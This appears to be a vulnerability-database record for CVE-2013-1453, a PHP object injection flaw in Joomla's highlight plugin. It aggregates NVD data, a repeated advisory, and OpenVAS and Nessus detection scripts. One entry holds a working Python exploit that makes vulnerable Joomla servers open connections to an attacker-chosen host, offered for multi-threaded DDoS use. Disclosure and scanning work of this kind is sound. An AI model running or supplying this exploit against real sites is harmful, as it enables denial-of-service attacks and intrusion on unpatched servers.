{"cve": [{"lastseen": "2020-10-03T12:45:57", "description": "plugins/system/highlight/highlight.php in Joomla! 3.0.x through 3.0.2 and 2.5.x through 2.5.8 allows attackers to unserialize arbitrary PHP objects to obtain sensitive information, delete arbitrary directories, conduct SQL injection attacks, and possibly have other impacts via the highlight parameter. Note: it was originally reported that this issue only allowed attackers to obtain sensitive information, but later analysis demonstrated that other attacks exist.", "edition": 3, "cvss3": {}, "published": "2013-02-13T01:55:00", "title": "CVE-2013-1453", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1453"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:joomla:joomla\\!:2.5.1", "cpe:/a:joomla:joomla\\!:3.0.0", "cpe:/a:joomla:joomla\\!:2.5.4", "cpe:/a:joomla:joomla\\!:2.5.3", "cpe:/a:joomla:joomla\\!:2.5.2", "cpe:/a:joomla:joomla\\!:2.5.6", "cpe:/a:joomla:joomla\\!:2.5.8", "cpe:/a:joomla:joomla\\!:2.5.0", "cpe:/a:joomla:joomla\\!:3.0.2", "cpe:/a:joomla:joomla\\!:2.5.7", "cpe:/a:joomla:joomla\\!:2.5.5", "cpe:/a:joomla:joomla\\!:3.0.1"], "id": "CVE-2013-1453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:joomla:joomla\\!:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.8:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:27:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1453"], "description": "Joomla! is prone to a remote PHP object-injection vulnerability because it\n fails to properly validate user-supplied input.", "modified": "2020-05-08T00:00:00", "published": "2013-03-03T00:00:00", "id": "OPENVAS:1361412562310103673", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103673", "type": "openvas", "title": "Joomla! 'highlight' Parameter PHP Object Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Joomla! 'highlight' Parameter PHP Object Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103673\");\n script_bugtraq_id(57746);\n script_cve_id(\"CVE-2013-1453\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_name(\"Joomla! 'highlight' Parameter PHP Object Injection Vulnerability\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-03 10:29:04 +0100 (Sun, 03 Mar 2013)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57746\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to a remote PHP object-injection vulnerability because it\n fails to properly validate user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to inject arbitrary object in to the application.\n This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Joomla! 2.0.0 through versions prior to 2.5.9\n\n Joomla! 
3.0.0 through versions prior to 3.0.3\");\n\n script_tag(name:\"qod\", value:\"50\"); # prone to false positives\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nurl = dir + '/index.php?highlight=YToxOntpOjA7Tzo3OiJPcGVuVkFTIjowOnt9fQ==';\n\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(buf =~ \"HTTP/1.. 500\" || \"Catchable fatal error: Object of class __PHP_Incomplete_Class could not be converted to string\" >< buf) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T23:31:25", "description": "Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability. CVE-2013-1453. Webapps exploit for php platform", "published": "2013-02-27T00:00:00", "type": "exploitdb", "title": "Joomla! <= 3.0.2 highlight.php PHP Object Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-27T00:00:00", "id": "EDB-ID:24551", "href": "https://www.exploit-db.com/exploits/24551/", "sourceData": "-------------------------------------------------------------------\r\nJoomla! 
<= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.joomla.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 3.0.2 and earlier 3.0.x versions.\r\nVersion 2.5.8 and earlier 2.5.x versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\r\n\r\n56.\t// Get the terms to highlight from the request.\r\n57.\t$terms = $input->request->get('highlight', null, 'base64');\r\n58.\t$terms = $terms ? unserialize(base64_decode($terms)) : null;\r\n\r\nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in\r\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\r\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\r\nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpgrade to version 3.0.3 or 2.5.9.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/10/2012] - Vendor notified\r\n[08/11/2012] - Vendor asked for a proof of concept\r\n[08/11/2012] - Proof of concept provided to the vendor\r\n[04/02/2013] - Vendor update released\r\n[27/02/2013] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2013-1453 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\r\n\r\n\r\n[-] Original Advisory:\r\n\r\nhttp://karmainsecurity.com/KIS-2013-03\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24551/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1453"], "description": 
"\r\n-------------------------------------------------------------------\r\nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.joomla.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 3.0.2 and earlier 3.0.x versions.\r\nVersion 2.5.8 and earlier 2.5.x versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\r\n\r\n56. // Get the terms to highlight from the request.\r\n57. $terms = $input->request->get('highlight', null, 'base64');\r\n58. $terms = $terms ? unserialize(base64_decode($terms)) : null;\r\n\r\nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in\r\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\r\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\r\nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpgrade to version 3.0.3 or 2.5.9.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/10/2012] - Vendor notified\r\n[08/11/2012] - Vendor asked for a proof of concept\r\n[08/11/2012] - Proof of concept provided to the vendor\r\n[04/02/2013] - Vendor update released\r\n[27/02/2013] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2013-1453 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\r\n\r\n\r\n[-] Original Advisory:\r\n\r\nhttp://karmainsecurity.com/KIS-2013-03\r\n", "edition": 1, "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:DOC:29133", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29133", "title": "[KIS-2013-03] Joomla! 
<= 3.0.2 (highlight.php) PHP Object Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-09T23:05:47", "edition": 2, "description": "Joomla core plugin 'highlight' unserializes not trusted input. Plugin\ris enabled by default in standard joomla installation.\r This proof of concept exploit uses JStream joomla class to make target\ropens remote tcp connections to custom address, therefore multiple\rvulnerable joomla instances can be used for ddos attacks. (JStream\rclass can also be used to execute chmod on any file with any mode)", "published": "2013-02-25T00:00:00", "type": "zdt", "title": "Joomla <=2.5.8,<=3.0.2 remote tcp connections opener", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-25T00:00:00", "id": "1337DAY-ID-20434", "href": "https://0day.today/exploit/description/20434", "sourceData": "#!/usr/bin/python\r\n#\r\n# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener\r\n#\r\n# Vendor homepage: www.joomla.org ,'\r\n# Versions affected: <=2.5.8, <=3.0.2 ,' \r\n# Created: 2012-12-08 .,. ,'\r\n# Public disclosure: 2013-02-04 .`.`.`. ,' ,'\r\n# CVE: CVE-2013-1453 .`.`.`.`. ,' ,'\r\n# .`.`.`.`.\r\n# Joomla core plugin 'highlight' unserializes .`.`.`.`. ,' ,'\r\n# not trusted input. Plugin is enabled by \\\\`.`.`. ,'\r\n# default in standard joomla installation. /\\.,. 
,' ,'\r\n# /\r\n# This proof of concept exploit uses JStream :\r\n# joomla class to make target opens remote tcp :\r\n# connections to custom address, therefore /\r\n# multiple vulnerable joomla instances can be \"\r\n# used for ddos attacks.\r\n#\r\n# (JStream class can also be used to execute chmod on any file with any mode)\r\n#\r\n# Author: Marcin \"redeemer\" Probola\r\n#\r\nimport threading\r\nimport datetime\r\nimport base64\r\nimport httplib\r\nfrom optparse import OptionParser\r\n\r\nparser = OptionParser()\r\nparser.add_option(\"-H\",\"--host\",dest=\"host\", help=\"Host with vulnerable joomla instance\", default=\"localhost\")\r\nparser.add_option(\"-C\",\"--connect\",dest=\"connectHost\", help=\"Make connection to (in format HOST:PORT)\", default=\"localhost:80\")\r\nparser.add_option(\"-T\",\"--threads\",dest=\"threads\", help=\"number of threads\", default=1)\r\n(options, args) = parser.parse_args()\r\n\r\n# vars\r\nhost = options.host\r\nconnectHost = options.connectHost\r\nthreads = int(options.threads)\r\n\r\n# prepare serialized content\r\nserializedTemplate = 'O:7:\"JStream\":14:{s:11:\"\\0*\\0filemode\";i:438;s:10:\"\\0*\\0dirmode\";i:493;s:12:\"\\0*\\0chunksize\";i:8192;s:11:\"\\0*\\0filename\";s:%d:\"%s\";s:14:\"\\0*\\0writeprefix\";s:0:\"\";s:13:\"\\0*\\0readprefix\";s:0:\"\";s:19:\"\\0*\\0processingmethod\";s:1:\"f\";s:10:\"\\0*\\0filters\";a:0:{}s:6:\"\\0*\\0_fh\";s:1:\"1\";s:12:\"\\0*\\0_filesize\";N;s:11:\"\\0*\\0_context\";N;s:18:\"\\0*\\0_contextOptions\";a:0:{}s:12:\"\\0*\\0_openmode\";s:1:\"w\";s:10:\"\\0*\\0_errors\";a:0:{}}'\r\nftpConnectUrl = \"ftp://u:[email\u00a0protected]\" + connectHost + \"/s\"\r\nserializedBase64 = base64.b64encode( serializedTemplate % ( ftpConnectUrl.__len__(), ftpConnectUrl) )\r\n\r\n# thread class - blow (make http request)\r\nclass ThreadClass(threading.Thread):\r\n\tdef run(self):\r\n\t\tconn = httplib.HTTPConnection(host)\r\n\t\tconn.connect()\r\n\t\tconn.request(\"GET\", 
\"/?highlight=\"+serializedBase64)\r\n\r\nprint host + \" connect(\" +str(threads)+\") to \" + connectHost + \"\\n\"\r\n\r\n# run threads\r\nfor i in range(threads):\r\n\tt = ThreadClass()\r\n\tt.start()\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20434"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:35", "description": "", "published": "2013-02-27T00:00:00", "type": "packetstorm", "title": "Joomla! 3.0.2 PHP Object Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-27T00:00:00", "id": "PACKETSTORM:120561", "href": "https://packetstormsecurity.com/files/120561/Joomla-3.0.2-PHP-Object-Injection.html", "sourceData": "`------------------------------------------------------------------- \nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability \n------------------------------------------------------------------- \n \n \n[-] Software Link: \n \nhttp://www.joomla.org/ \n \n \n[-] Affected Versions: \n \nVersion 3.0.2 and earlier 3.0.x versions. \nVersion 2.5.8 and earlier 2.5.x versions. \n \n \n[-] Vulnerability Description: \n \nThe vulnerable code is located in /plugins/system/highlight/highlight.php: \n \n56. // Get the terms to highlight from the request. \n57. $terms = $input->request->get('highlight', null, 'base64'); \n58. $terms = $terms ? unserialize(base64_decode($terms)) : null; \n \nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in \nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the \napplication scope. Successful exploitation of this vulnerability doesn't require authentication, \nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration). \n \n \n[-] Solution: \n \nUpgrade to version 3.0.3 or 2.5.9. 
\n \n \n[-] Disclosure Timeline: \n \n[31/10/2012] - Vendor notified \n[08/11/2012] - Vendor asked for a proof of concept \n[08/11/2012] - Proof of concept provided to the vendor \n[04/02/2013] - Vendor update released \n[27/02/2013] - Public disclosure \n \n \n[-] CVE Reference: \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) \nhas assigned the name CVE-2013-1453 to this vulnerability. \n \n \n[-] Credits: \n \nVulnerability discovered by Egidio Romano. \n \n \n[-] Original Advisory: \n \nhttp://karmainsecurity.com/KIS-2013-03 \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120561/joomla302-inject.txt"}], "seebug": [{"lastseen": "2017-11-19T16:10:32", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78253", "id": "SSV:78253", "sourceData": "\n -------------------------------------------------------------------\r\nJoomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.joomla.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 3.0.2 and earlier 3.0.x versions.\r\nVersion 2.5.8 and earlier 2.5.x versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\r\n\r\n56.\t// Get the terms to highlight from the request.\r\n57.\t$terms = $input->request->get('highlight', null, 'base64');\r\n58.\t$terms = $terms ? 
unserialize(base64_decode($terms)) : null;\r\n\r\nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in\r\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\r\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\r\nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration).\r\n\r\n\r\n[-] Solution:\r\n\r\nUpgrade to version 3.0.3 or 2.5.9.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/10/2012] - Vendor notified\r\n[08/11/2012] - Vendor asked for a proof of concept\r\n[08/11/2012] - Proof of concept provided to the vendor\r\n[04/02/2013] - Vendor update released\r\n[27/02/2013] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2013-1453 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\r\n\r\n\r\n[-] Original Advisory:\r\n\r\nhttp://karmainsecurity.com/KIS-2013-03\r\n\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78253"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:22", "description": "\nJoomla! 3.0.2 - highlight.php PHP Object Injection", "edition": 1, "published": "2013-02-27T00:00:00", "title": "Joomla! 3.0.2 - highlight.php PHP Object Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1453"], "modified": "2013-02-27T00:00:00", "id": "EXPLOITPACK:550AD19DA74828F7399FCFE454945C00", "href": "", "sourceData": "-------------------------------------------------------------------\nJoomla! 
<= 3.0.2 (highlight.php) PHP Object Injection Vulnerability\n-------------------------------------------------------------------\n\n\n[-] Software Link:\n\nhttp://www.joomla.org/\n\n\n[-] Affected Versions:\n\nVersion 3.0.2 and earlier 3.0.x versions.\nVersion 2.5.8 and earlier 2.5.x versions.\n\n\n[-] Vulnerability Description:\n\nThe vulnerable code is located in /plugins/system/highlight/highlight.php:\n\n56.\t// Get the terms to highlight from the request.\n57.\t$terms = $input->request->get('highlight', null, 'base64');\n58.\t$terms = $terms ? unserialize(base64_decode($terms)) : null;\n\nUser input passed through the \"highlight\" parameter is not properly sanitized before being used in\nan unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the\napplication scope. Successful exploitation of this vulnerability doesn't require authentication,\nbut requires the \"System Highlight\" plugin to be enabled (such as by default configuration).\n\n\n[-] Solution:\n\nUpgrade to version 3.0.3 or 2.5.9.\n\n\n[-] Disclosure Timeline:\n\n[31/10/2012] - Vendor notified\n[08/11/2012] - Vendor asked for a proof of concept\n[08/11/2012] - Proof of concept provided to the vendor\n[04/02/2013] - Vendor update released\n[27/02/2013] - Public disclosure\n\n\n[-] CVE Reference:\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\nhas assigned the name CVE-2013-1453 to this vulnerability.\n\n\n[-] Credits:\n\nVulnerability discovered by Egidio Romano.\n\n\n[-] Original Advisory:\n\nhttp://karmainsecurity.com/KIS-2013-03", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-20T11:36:20", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.9\nor 3.0.x prior to 3.0.3. 
It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in the highlight.php script, within the\n PlgSystemHighlight::onAfterDispatch() function, due to\n improper sanitization of input passed via the\n 'highlight' parameter before it is used in an\n unserialize() call. An authenticated, remote attacker\n can exploit this issue to unserialize arbitrary PHP\n objects, resulting in disclosure of sensitive\n information, deletion of arbitrary directories, SQL\n injection, or other impacts. (CVE-2013-1453)\n\n - An unspecified coding error exists that allows an\n unauthenticated, remote attacker to disclose sensitive\n information. (CVE-2013-1454)\n\n - An unspecified flaw exists when handling undefined\n variables that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2013-1455)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2013-02-14T00:00:00", "title": "Joomla! 2.5.x < 2.5.9 / 3.0.x < 3.0.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1454", "CVE-2013-1455", "CVE-2013-1453"], "modified": "2013-02-14T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_259.NASL", "href": "https://www.tenable.com/plugins/nessus/64634", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64634);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2013-1453\",\n \"CVE-2013-1454\",\n \"CVE-2013-1455\"\n );\n script_bugtraq_id(\n 57746,\n 57751,\n 57752\n );\n script_xref(name:\"EDB-ID\", value:\"24551\");\n\n script_name(english:\"Joomla! 
2.5.x < 2.5.9 / 3.0.x < 3.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.9\nor 3.0.x prior to 3.0.3. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A flaw exists in the highlight.php script, within the\n PlgSystemHighlight::onAfterDispatch() function, due to\n improper sanitization of input passed via the\n 'highlight' parameter before it is used in an\n unserialize() call. An authenticated, remote attacker\n can exploit this issue to unserialize arbitrary PHP\n objects, resulting in disclosure of sensitive\n information, deletion of arbitrary directories, SQL\n injection, or other impacts. (CVE-2013-1453)\n\n - An unspecified coding error exists that allows an\n unauthenticated, remote attacker to disclose sensitive\n information. (CVE-2013-1454)\n\n - An unspecified flaw exists when handling undefined\n variables that allows an unauthenticated, remote\n attacker to disclose sensitive information.\n (CVE-2013-1455)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5477-joomla-2-5-9-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7433d5d\");\n # https://www.joomla.org/announcements/release-news/5478-joomla-3-0-3-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?58ded3b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 2.5.9 / 3.0.3 or later. 
Alternatively,\napply the patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"2.5.9 / 3.0.3\";\n\n# Check granularity\nif (version =~ \"^2(\\.5)?$\" 
|| version =~ \"^3(\\.0)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"app\", port, version);\n\n# Versions 2.5.x < 2.5.9 and 3.0.x < 3.0.3 are vulnerable\nif (\n version =~ \"^2\\.5\\.[0-8]([^0-9]|$)\" ||\n version =~ \"^3\\.0\\.[0-2]([^0-9]|$)\"\n)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}